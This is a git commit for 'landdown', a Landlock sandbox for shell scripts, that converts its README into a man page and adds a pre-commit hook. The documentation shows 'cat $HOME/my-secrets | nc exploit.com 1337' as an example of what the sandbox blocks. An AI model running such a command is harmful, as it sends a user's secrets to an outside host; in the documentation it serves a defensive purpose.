landdown

Simple Sandboxing for shell scripts.

git clone git://mccd.space/landdown

commit 37ceda979cf1a5ffef3454827f070445e9add7ff
parent fb2e799fd8cf1ddfde9648657618b3434851d9a9
Author: Marc <marc@coquand.email>
Date:   Tue, 30 Jun 2026 10:44:50 +0200

*

Diffstat:

A.gitignore | 1+


AREADME | 111+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


DREADME.md | 110-------------------------------------------------------------------------------


Alanddown.1 | 124+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Apre-commit.sh | 5+++++


5 files changed, 241 insertions(+), 110 deletions(-)
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1 @@
+landdown
diff --git a/README b/README
@@ -0,0 +1,111 @@
+landdown(1)                 General Commands Manual                landdown(1)
+
+
+
+NNAAMMEE
+       Landdown - Simple shell script sandbox
+
+
+DDEESSCCRRIIPPTTIIOONN
+       Landdown is an easy-to-use utility for Linux that allows you to sandbox
+       shell scripts with Landlock. Just like Landlock, Landdown "aims to
+       protect you against the security impacts of bugs or
+       unexpected/malicious behavior". To use, prepend your script with the
+       landdown shebang and a ruleset, and then write your shell script like
+       you would normally. For example:
+
+       #!/usr/bin/env landdown
+       ro /bin
+       ro /lib
+       #!/bin/sh
+       # Following works
+       echo "Hi"
+       # Following fails
+       cat $HOME/my-secrets | nc exploit.com 1337
+
+
+       Landdown locks down file and network access of a script based on rules
+       explicitly listed in the allowlist.
+
+
+
+SSUUPPPPOORRTTEEDD RRUULLEESS
+       rof <file>
+       rwf <file>
+       ro <dir>
+       rw <dir>
+       bind <port>
+       connect <port>
+
+
+       Each rule can be used zero or more times.
+
+
+       The syntax is:
+
+       #!/usr/bin/env landdown
+       <rules...>
+       #!<interpreter>
+       <script content...>
+
+
+IINNSSTTAALLLL
+       go install git.sr.ht/~marcc/landdown@latest
+
+
+       Arch Linux <https://aur.archlinux.org/packages/landdown-git>
+
+
+EEXXAAMMPPLLEESS
+   AAcccceessss aa ffiillee
+       Write the following script
+
+       #!/usr/bin/env landdown
+       ro /bin
+       ro /lib
+       rwf /tmp/some-file.txt
+       #!/bin/sh
+       echo "Edit" > /tmp/some-file.txt
+
+
+       Try removing rwf /tmp/some-file.txt and the script should fail.
+
+
+       Note: the file need to exist in order for landdown to work, run touch
+       /tmp/some-file.txt to test.
+
+
+   NNeettwwoorrkk aacccceessss
+       Write the following script
+
+       #!/usr/bin/env landdown
+       ro /bin
+       ro /lib
+       ro /etc/ssl
+       rof /etc/resolv.conf
+       connect 443
+       #!/bin/bash
+       curl https://www.google.com
+
+
+       Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443 and it
+       should fail. Network access needs to be explicitly set.
+
+
+CCOONNTTRRIIBBUUTTIIOONNSS
+       Contributions are welcome. Please send them to my public inbox
+       <~marcc/public-inbox@lists.sr.ht>
+
+
+SSEEEE AALLSSOO
+       sshh(1) - section on ulimit
+
+
+       Good Practices <https://docs.kernel.org/userspace-
+       api/landlock.html#good-practices>
+
+
+   AAlltteerrnnaattiivveess
+       bbuubbbblleewwrraapp(1) ffiirreejjaaiill(1) llaannddrruunn(1)
+
+                                  2026-06-30                       landdown(1)
diff --git a/README.md b/README.md
@@ -1,110 +0,0 @@
-# Landdown - Simple shell script sandbox
-
-Landdown is an easy-to-use utility for Linux that allows you to
-sandbox shell scripts with [Landlock](https://landlock.io). Just like
-Landlock, Landdown "aims to protect you against the security impacts
-of bugs or unexpected/malicious behavior". To use, prepend your script
-with the landdown shebang and a ruleset, and then write your shell
-script like you would normally. For example:
-
-```sh
-#!/usr/bin/env landdown
-ro /bin 
-ro /lib
-#!/bin/sh
-# Following works
-echo "Hi"
-# Following fails
-cat $HOME/my-secrets | nc exploit.com 1337
-```
-
-Landdown locks down file and network access of a script based on rules
-explicitly listed in the allowlist.
-
-The syntax is:
-
-```
-#!/usr/bin/env landdown
-<rules...>
-#!<interpreter>
-<script content...>
-```
-
-## Supported rules
-
-```
-rof <file>
-rwf <file>
-ro <dir>
-rw <dir>
-bind <port>
-connect <port>
-```
-
-Each rule can be used zero or more times.
-
-
-## Install
-
-Generic install:
-
-```
-go install git.sr.ht/~marcc/landdown@latest
-```
-
-Arch Linux: [aur](https://aur.archlinux.org/packages/landdown-git)
-
-## Examples
-
-### Access a file
-
-```sh
-#!/usr/bin/env landdown
-ro /bin 
-ro /lib
-rwf /tmp/some-file.txt
-#!/bin/sh
-echo "Edit" > /tmp/some-file.txt
-```
-
-Try removing `rwf /tmp/some-file.txt` and the script should fail.
-
-Note: the file need to exist in order for landdown to work, run `touch
-/tmp/some-file.txt` to test.
-
-### Network access
-
-```sh
-#!/usr/bin/env landdown
-ro /bin 
-ro /lib 
-ro /etc/ssl
-rof /etc/resolv.conf
-connect 443
-#!/bin/bash
-curl https://www.google.com
-```
-
-Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443`
-and it should fail. Network access needs to be explicitly set.
-
-## Patches & Contributions
-
-Contributions are welcome. Please send them to my [public
-inbox](mailto:~marcc/public-inbox@lists.sr.ht)
-
-## See also
-
-- **sh**(1) - section on ulimit
-- [Good Practices](https://docs.kernel.org/userspace-api/landlock.html#good-practices)
-
-
-### Alternatives
-
-- **[bubblewrap](https://github.com/containers/bubblewrap)**(1)
-- **[firejail](https://github.com/netblue30/firejail/tree/HEAD/src/firejail)**(1)
-- **[landrun](https://github.com/Zouuup/landrun)**(1)
-
-Landdown tries to be as friction-less and simple as possible, and
-specifically targets shell scripts rather than command line
-invocations.
diff --git a/landdown.1 b/landdown.1
@@ -0,0 +1,124 @@
+.TH "landdown" 1 2026-06-30
+
+.SH NAME
+
+Landdown - Simple shell script sandbox
+
+.SH DESCRIPTION
+
+.PP
+Landdown is an easy-to-use utility for Linux that allows you to
+sandbox shell scripts with Landlock. Just like Landlock, Landdown
+"aims to protect you against the security impacts of bugs or
+unexpected/malicious behavior". To use, prepend your script with the
+landdown shebang and a ruleset, and then write your shell script like
+you would normally. For example:
+
+.EX
+#!/usr/bin/env landdown
+ro /bin 
+ro /lib
+#!/bin/sh
+# Following works
+echo "Hi"
+# Following fails
+cat $HOME/my-secrets | nc exploit.com 1337
+.EE
+
+.PP
+Landdown locks down file and network access of a script based on rules
+explicitly listed in the allowlist.
+
+
+.SH SUPPORTED RULES
+
+.EX
+rof <file>
+rwf <file>
+ro <dir>
+rw <dir>
+bind <port>
+connect <port>
+.EE
+
+.PP
+Each rule can be used zero or more times.
+
+.PP
+The syntax is:
+
+.EX
+#!/usr/bin/env landdown
+<rules...>
+#!<interpreter>
+<script content...>
+.EE
+
+.SH INSTALL
+
+.EX
+go install git.sr.ht/~marcc/landdown@latest
+.EE
+
+.PP
+Arch Linux <https://aur.archlinux.org/packages/landdown-git>
+
+.SH EXAMPLES
+
+.SS Access a file
+.PP
+Write the following script
+
+.EX
+#!/usr/bin/env landdown
+ro /bin 
+ro /lib
+rwf /tmp/some-file.txt
+#!/bin/sh
+echo "Edit" > /tmp/some-file.txt
+.EE
+
+.PP
+Try removing rwf /tmp/some-file.txt and the script should fail.
+
+.PP
+Note: the file need to exist in order for landdown to work, run touch
+/tmp/some-file.txt to test.
+
+.SS Network access
+.PP
+Write the following script
+
+.EX
+#!/usr/bin/env landdown
+ro /bin 
+ro /lib 
+ro /etc/ssl
+rof /etc/resolv.conf
+connect 443
+#!/bin/bash
+curl https://www.google.com
+.EE
+
+.PP
+Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443
+and it should fail. Network access needs to be explicitly set.
+
+.SH CONTRIBUTIONS
+
+Contributions are welcome. Please send them to my public
+inbox <~marcc/public-inbox@lists.sr.ht>
+
+.SH SEE ALSO
+
+.PP
+\fBsh\fR(1) - section on ulimit
+
+.PP
+Good Practices <https://docs.kernel.org/userspace-api/landlock.html#good-practices>
+
+.SS Alternatives
+
+\fBbubblewrap\fR(1)
+\fBfirejail\fR(1)
+\fBlandrun\fR(1)
diff --git a/pre-commit.sh b/pre-commit.sh
@@ -0,0 +1,5 @@
+#!/bin/sh
+# Add to your hooks
+# ln -sf ../../pre-commit.sh .git/hooks/pre-commit
+man -l landdown.1 > README
+git add README